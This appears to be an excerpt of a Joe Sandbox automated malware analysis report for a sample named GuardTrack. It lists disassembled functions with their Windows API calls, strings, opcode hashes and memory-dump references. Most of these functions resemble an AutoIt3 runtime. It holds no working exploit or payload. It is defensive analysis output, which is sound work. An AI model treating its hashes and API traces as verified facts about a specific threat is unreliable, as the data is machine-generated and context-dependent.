Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken
String ID:
API String ID: 3974789173-0
Opcode ID: 04d8a1a1323399c11c76499c0ec93b162e10e89a0fbe18f5beb4935f19529a20
Instruction ID: dced0cfb5894db16e6e8081103cc6d1636d94e328c9fcb8fc2c186d6b15bd80b
Opcode Fuzzy Hash: 04d8a1a1323399c11c76499c0ec93b162e10e89a0fbe18f5beb4935f19529a20
Instruction Fuzzy Hash: FBE0863A6412319FE7241FF15D0DF973BAEEF56791F108818B745C90D0E6349444CB60

Function 005F0679 Relevance: 6.0, APIs: 4, Instructions: 20COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 005F0679
GetDC.USER32(00000000), ref: 005F0683
GetDeviceCaps.GDI32(00000000,0000000C), ref: 005F06A3
ReleaseDC.USER32(?), ref: 005F06C4

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: e9f7a9c0172e2e7e345e0ee35be0893593d111148e8ba3bbdea8703b646581c5
Instruction ID: 8b97c78984a6f98ceed11cfec91723a6d2030f4f9d457d56a754f057dc9e9f95
Opcode Fuzzy Hash: e9f7a9c0172e2e7e345e0ee35be0893593d111148e8ba3bbdea8703b646581c5
Instruction Fuzzy Hash: D9E0E579800214EFEB019F60D808AAD7FB2FB8C310F129409FE5AA7250DB3895519F50

Function 005F068D Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 005F068D
GetDC.USER32(00000000), ref: 005F0697
GetDeviceCaps.GDI32(00000000,0000000C), ref: 005F06A3
ReleaseDC.USER32(?), ref: 005F06C4

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: c32bb3851b20c4be9f1dcaa61a9e9f2395b0f5817ae20ed0d286876ff4e0b2bf
Instruction ID: 9e080d91d300ce0082a45ca60623b2f9683679f220dc498e8f964500f536f932
Opcode Fuzzy Hash: c32bb3851b20c4be9f1dcaa61a9e9f2395b0f5817ae20ed0d286876ff4e0b2bf
Instruction Fuzzy Hash: FDE012B9800214AFEB11AFA0D808A9D7FF2FF8C310F128408FE5AA7210DB38A5518F50

Function 005D5FCC Relevance: 6.0, APIs: 4, Instructions: 14threadCOMMON

Download Yara Rule

APIs

__getptd_noexit.LIBCMT ref: 005D5FCD

Part of subcall function 005D9BF4: GetLastError.KERNEL32(?,005D1003,005D8D5D,005D59C3,?,?,005D1003,?,0000FFFF), ref: 005D9BF6
Part of subcall function 005D9BF4: __calloc_crt.LIBCMT ref: 005D9C17
Part of subcall function 005D9BF4: __initptd.LIBCMT ref: 005D9C39
Part of subcall function 005D9BF4: GetCurrentThreadId.KERNEL32 ref: 005D9C40
Part of subcall function 005D9BF4: SetLastError.KERNEL32(00000000,005D1003,005D8D5D,005D59C3,?,?,005D1003,?,0000FFFF), ref: 005D9C58

CloseHandle.KERNEL32(?,?,005D5FAC), ref: 005D5FE1
__freeptd.LIBCMT ref: 005D5FE8
ExitThread.KERNEL32 ref: 005D5FF0

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: ErrorLastThread$CloseCurrentExitHandle__calloc_crt__freeptd__getptd_noexit__initptd
String ID:
API String ID: 4169687693-0
Opcode ID: a0a062de5142534f520ef495620e6ddb82bc076b4b19294618d376423c5fbd59
Instruction ID: daa07aaa28a74db58789454fc7af50c46d7d89e136a5361798ee1e510f795813
Opcode Fuzzy Hash: a0a062de5142534f520ef495620e6ddb82bc076b4b19294618d376423c5fbd59
Instruction Fuzzy Hash: 5FD0A731006E63CBE3322B6CAC0DE193E117F01B21F055217F565592F09B3188028641

Function 0060BE8C Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 241comCOMMON

Download Yara Rule

APIs

OleSetContainedObject.OLE32(?,00000001), ref: 0060C057

Strings

AutoIt3GUI, xrefs: 0060BFCF
Container, xrefs: 0060BFD4

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: ContainedObject
String ID: AutoIt3GUI$Container
API String ID: 3565006973-3941886329
Opcode ID: e45e2863020caa9039107b841fd12726dbfe376efed9bcf9e0ed9a1141de65d4
Instruction ID: 7165e6dd1b0aa949b614c04e417566ea90d6db657bb817bbd294a92756badb4f
Opcode Fuzzy Hash: e45e2863020caa9039107b841fd12726dbfe376efed9bcf9e0ed9a1141de65d4
Instruction Fuzzy Hash: 47913970640602AFDB58DF64C884A6BBBF6FF49710F20856EE94ADB391DB71E841CB50

Function 0061B5EF Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON

Download Yara Rule

APIs

Part of subcall function 005C436A: _wcscpy.LIBCMT ref: 005C438D

Part of subcall function 005B4D37: __itow.LIBCMT ref: 005B4D62
Part of subcall function 005B4D37: __swprintf.LIBCMT ref: 005B4DAC

__wcsnicmp.LIBCMT ref: 0061B670
WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0061B739

Strings

LPT, xrefs: 0061B66A

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
String ID: LPT
API String ID: 3222508074-1350329615
Opcode ID: d0714d3ee7865c8fe76d7a89c96cc4eae8f546ef62799ab4371a353df36f886b
Instruction ID: 7de4d6600fbe55786cf3046c613c0aee96ad9377789a4c45e8df2a76546015d7
Opcode Fuzzy Hash: d0714d3ee7865c8fe76d7a89c96cc4eae8f546ef62799ab4371a353df36f886b
Instruction Fuzzy Hash: 5A618275A00215AFCB14DF94C895EEEB7B5FF88710F14805AF546AB391D770AE81CB90

Function 005F7190 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 148COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 005F7237
_memmove.LIBCMT ref: 005F7291

Strings

#V\, xrefs: 005F730B, 005FCAB3, 005FCACF

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: _memmove
String ID: #V\
API String ID: 4104443479-1266075302
Opcode ID: ed027f9915e38e1a83fee097b9050245e7fbee43dedd53881acccb065ad1e944
Instruction ID: 76d9a06632ed8c4ed4a524dcac707350c56dc7774ba20b1f9e18c83e6082fd2f
Opcode Fuzzy Hash: ed027f9915e38e1a83fee097b9050245e7fbee43dedd53881acccb065ad1e944
Instruction Fuzzy Hash: F4515A70A0060DDFCF24CFA8C884ABEBBB1FF49304F14852AE95AD7240E734A955CB91

Function 005BE00D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 005BE01E
GlobalMemoryStatusEx.KERNEL32(?), ref: 005BE037

Strings

@, xrefs: 005BE02B

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: f10b837a64ddfc2343db9cb310b50541ae6cac199e8e852abb4bb4d05e337dac
Instruction ID: c9c652d5786c107612a7a782e71116993b74fb9c9d017871e200597e4dd99a32
Opcode Fuzzy Hash: f10b837a64ddfc2343db9cb310b50541ae6cac199e8e852abb4bb4d05e337dac
Instruction Fuzzy Hash: ED514A71408B499BE320AF50E88ABAFBBF8FFC4315F41484DF2D941192DB70A569CB16

Function 00638096 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000027,00001132,00000000,?), ref: 00638186
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0063819B

Strings

', xrefs: 006380EF

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: MessageSend
String ID: '
API String ID: 3850602802-1997036262
Opcode ID: bcb78ea752962812cf59cb077fd6cabf50e7df83ae560f12e7c6f40e05749163
Instruction ID: 8b14f3ef383334f74721ff02dfb9d1348d9c42558a29bdb12b782d3f57cfda41
Opcode Fuzzy Hash: bcb78ea752962812cf59cb077fd6cabf50e7df83ae560f12e7c6f40e05749163
Instruction Fuzzy Hash: A0410874A0130A9FDB14CF64C881BDA7BB6FB09340F10016AF909AB351DB71A956CF90

Function 00622C5A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00622C6A
InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00622CA0

Strings

|, xrefs: 00622C71

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: CrackInternet_memset
String ID: |
API String ID: 1413715105-2343686810
Opcode ID: 935c72478176eb54576bc626790b626d672131747c5bef83799c94aad1c14e53
Instruction ID: 4162563b71f4498532c0d77159849f1b3aba67955108bd7c195099bc1605f1e2
Opcode Fuzzy Hash: 935c72478176eb54576bc626790b626d672131747c5bef83799c94aad1c14e53
Instruction Fuzzy Hash: 2F311871C0051AAFCF11EFA4DC85EEEBFB9FF45304F100019F915A6262DA315916DBA4

Function 00637088 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 0063713C
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00637178

Strings

static, xrefs: 006370D8

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: 352878f6f777ece66ce60dd3408f71eb61af18ed23c07fe098d0079b27a7ef16
Instruction ID: fcf619dd4aa226b08b118c7575e21469750f959dc7ae9f246cbd1d3927472f20
Opcode Fuzzy Hash: 352878f6f777ece66ce60dd3408f71eb61af18ed23c07fe098d0079b27a7ef16
Instruction Fuzzy Hash: A13184B1100604AEEB249F74CC41AFB77BAFF88724F10961DF99587191DB31AC91DBA0

Function 00613049 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 006130B8
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 006130F3

Strings

0, xrefs: 006130B1

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: 11cf266bb986ece12d43cd1aa68f6866928a2f82d236771fe5b2cdcb40bd30b9
Instruction ID: 5d373a01dcc2359a71ab02d7cc1ebbd6620385de019e7257ca7ba67ea624285a
Opcode Fuzzy Hash: 11cf266bb986ece12d43cd1aa68f6866928a2f82d236771fe5b2cdcb40bd30b9
Instruction Fuzzy Hash: 6731F731600215FBEB248F58C986BEEBBBAFF05350F1C4019E986A6390D7709B84CB50

Function 006240B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 84COMMON

Download Yara Rule

APIs

__snwprintf.LIBCMT ref: 00624132

Part of subcall function 005C1A36: _memmove.LIBCMT ref: 005C1A77

Strings

, $, xrefs: 00624172
AUTOITCALLVARIABLE%d, xrefs: 00624124

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: __snwprintf_memmove
String ID: , $$AUTOITCALLVARIABLE%d
API String ID: 3506404897-2584243854
Opcode ID: 333f03990f27a947507e9fd422489e8f242e5b05e8721db4ea7894b45d3b1294
Instruction ID: 06f3982b2faec7567a0e8ebe167e03aee61f2f2f65b62b5a01aeb0a8fcc6b460
Opcode Fuzzy Hash: 333f03990f27a947507e9fd422489e8f242e5b05e8721db4ea7894b45d3b1294
Instruction Fuzzy Hash: F321B430A00629AFCF14EFA4D859EAE7BB6BF95340F040458F905A7242DB30E955CFA5

Function 00636CF9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00636D86
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00636D91

Strings

Combobox, xrefs: 00636D53

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: 79203fe6d20d0f0e53d0b04148f01d91120fcb1ad4e8bd44bd24d8f3686aa98e
Instruction ID: ea44ab66dff8bfb6ea923b5170517ad83aee01a50ce5b3b8258182aa9afbe362
Opcode Fuzzy Hash: 79203fe6d20d0f0e53d0b04148f01d91120fcb1ad4e8bd44bd24d8f3686aa98e
Instruction Fuzzy Hash: 1E116071310209BFEF259E54DC81EFB3B6BEF843A4F118129F9189B290D671AC5187A0

Function 0063722C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 005B2111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 005B214F
Part of subcall function 005B2111: GetStockObject.GDI32(00000011), ref: 005B2163
Part of subcall function 005B2111: SendMessageW.USER32(00000000,00000030,00000000), ref: 005B216D

GetWindowRect.USER32(00000000,?), ref: 00637296
GetSysColor.USER32(00000012), ref: 006372B0

Strings

static, xrefs: 00637273

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: 4b6052583ae5bcb5c5d6bf7185b70ce75aa3b42364a6ca88730b82041073aea4
Instruction ID: fb80487566e456eab7b25cfa0945b94a42ad4ff9f7abd4c4622ff509e01e602c
Opcode Fuzzy Hash: 4b6052583ae5bcb5c5d6bf7185b70ce75aa3b42364a6ca88730b82041073aea4
Instruction Fuzzy Hash: 41214772A1420AAFDB14DFA8CC45AFA7BE9EB08304F005518FE55D3250D634E851DBA0

Function 00636F45 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(00000000), ref: 00636FC7
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00636FD6

Strings

edit, xrefs: 00636FAB

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: LengthMessageSendTextWindow
String ID: edit
API String ID: 2978978980-2167791130
Opcode ID: 144633d4e2c4793959c25ccf1852a5989c751b26da93214f6bc685b94d42bc82
Instruction ID: d2d68e22bfef8d7c8cf09b6e082e55e26c84781861f13a144e91011e59f99f85
Opcode Fuzzy Hash: 144633d4e2c4793959c25ccf1852a5989c751b26da93214f6bc685b94d42bc82
Instruction Fuzzy Hash: 1B114F71500209BFEB105E64EC84EFB3B6BEB45368F109718FA65972E0C775DC919BA0

Function 00613156 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 006131C9
GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 006131E8

Strings

0, xrefs: 006131BF

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: 5f8bc4f08135ba20c693978b72db91976aa4c525fc91fae572a24439b0d79b59
Instruction ID: 13b5d6f297b6ed4ae113efdf788c3426a126b62e0a458e58efde0a243744cbff
Opcode Fuzzy Hash: 5f8bc4f08135ba20c693978b72db91976aa4c525fc91fae572a24439b0d79b59
Instruction Fuzzy Hash: 4711D036901135BBEB24DA98DC46BDD77BEAB05310F184122E817A73A0D770AF89CB91

Function 005B34E4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

DeleteObject.GDI32(?), ref: 005B351D
DestroyWindow.USER32(?,?,005C4E61), ref: 005B3576

Strings

hd, xrefs: 005B34E5

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: DeleteDestroyObjectWindow
String ID: hd
API String ID: 2587070983-580410754
Opcode ID: ff5fbb1078b304250ab6c0b9d54877d716f7919af1e63b07580cefaf5e6dd668
Instruction ID: dbed98d38defad2be9f2c445dfe45021c9b125af5d9e2d11565776ddd29aa53c
Opcode Fuzzy Hash: ff5fbb1078b304250ab6c0b9d54877d716f7919af1e63b07580cefaf5e6dd668
Instruction Fuzzy Hash: C1214F34609611CFDB2CDF28D858BA93BE6BB44310B14656CE80A972A0DB30FE80DB56

Function 006228A2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 006228F8
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00622921

Strings

<local>, xrefs: 006228E9

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: fd7068488a02ec77c58f7038d95be23317a496ee7cde3c021b7851cb1eb5107f
Instruction ID: f47beef33cecca19264442cdbc50f772fcb9d7ad5be3c321991bcdc77779df9e
Opcode Fuzzy Hash: fd7068488a02ec77c58f7038d95be23317a496ee7cde3c021b7851cb1eb5107f
